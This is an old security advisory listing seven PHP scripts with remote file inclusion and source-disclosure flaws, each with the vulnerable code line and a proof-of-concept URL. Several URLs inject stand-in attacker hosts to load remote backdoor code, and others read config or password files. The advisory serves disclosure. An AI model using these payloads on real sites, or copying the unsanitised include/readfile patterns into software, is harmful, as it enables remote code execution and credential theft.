Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14625
HistoryOct 11, 2006 - 12:00 a.m.

7 php scripts File Inclusion / Source disclosure Vuln

2006-10-1100:00:00
vulners.com
72

Title…: 7 php scripts File Inclusion Vuln / Source disclosure

Credits: DarkFig

Og.link: http://acid-root.new.fr/poc/13061007.txt

Using http://www.google.com/codesearch

Few examples about what we can do with a code search engine

For educational purpose only.

You can use regex in your research, this can be chaotic.

What's your opinion about the google code search project ?

Affected.scr: TribunaLibre v3.12 Beta

Download…: http://www.phplibre.com.es/downloads/TribunaLibre_v3.12_Beta.zip

Poc…: http://victim.com/ftag.php?mostrar=http://backdoor.txt?

Vuln.code…: Line 106, <? include($_GET['mostrar']); ?>

Affected.scr: registroTL

Download…: http://www.phplibre.com.es/downloads/registroTL.zip

Poc…: http://victim.com/main.php?page=ftp://hack.com/backdrphpext

http://victim.com/usuarios.dat <- Passwords disclosure

Vuln.code…: if (isset($_GET['page']) && file_exists($_GET['page'].".php"))

include($_GET['page'].".php");

Affected.scr: compteur_v2

Download…: http://zebigbrozer.free.fr/compt_new/compteur_v2.zip

Poc…: http://victim.xx/param_editor.php?folder=http://hack.c/backd.txt?

Vuln.code…: Line 9 , include($_GET["folder"]."param.php")

Affected.scr: eboli

Download…: http://www.jhjgubbels.nl/eboli/eboli.tar.gz

Poc…: http://x.com/index.php?contentSpecial=http://hack.c/back.txt?&amp;content

Vuln.code…: Line 45, if(isset($_GET['contentSpecial']) && isset($_GET['content'])){

include($_GET['contentSpecial']);

Affected.scr: Jasmine-Web

Download…: http://www.sourcefiles.org/Utilities/Printer/Jasmine-Web-0.0.2.tar.bz2

Poc…: http://victim.pl/index.php?section=ftp://hack.com/backdrphpext

Vuln.code…: if (isset($_GET['section']) && file_exists($_GET['section'].".php")){

include_once($_GET['section'].".php");

Affected.scr: Foafgen v0.3

Download…: http://www.toxi.co.uk/foafgen/foafgen_v0.3.0.zip

Poc…: http://victim.com/redir.php?foaf=file.php

Vuln.code…: Line 4, readfile($_GET['foaf']);

Affected.scr: Album Photo Sans Nom v1.6

Download…: http://scripts.bezut.info/releases/APSN/albumV1.6.tgz

Poc…: http://victim.pl/getimg.php?img=config.inc.php

Vuln.code…: Line 47, readfile($_GET['img']);